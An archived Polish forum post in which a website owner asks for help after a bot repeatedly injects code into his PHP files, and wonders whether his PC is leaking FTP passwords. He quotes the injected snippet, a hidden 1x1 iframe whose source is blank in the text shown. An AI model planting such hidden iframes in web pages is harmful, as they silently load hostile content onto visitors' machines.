GRY-Online.pl --> Archiwum Forum

Spam bot - złodziej?

04.01.2009
17:06
smile
[1]

eJay [ Gladiator ]

Spam bot - złodziej?

Witam. Posiadam stronkę na serwerze obsługującym PHP. Pech chciał (a raczej chce), że co jakiś czas jest ona infekowana jakimś botem, który podczepia pod pliki PHP następujący kod:

<html><body><iframe src=" width=1 height=1 style="visibility: hidden"></iframe></body></html>

Stronka sie sypie i trzeba zrobic upload co tez troche trwa. Moje pytanko jest takie: czy to wina mojego kompa? Moze cos siedzi u mnie na dysku i kradnie hasla do FTP? Skanowalem system juz 10 razy i nic nie wykrylo.

© 2000-2026 GRY-OnLine S.A.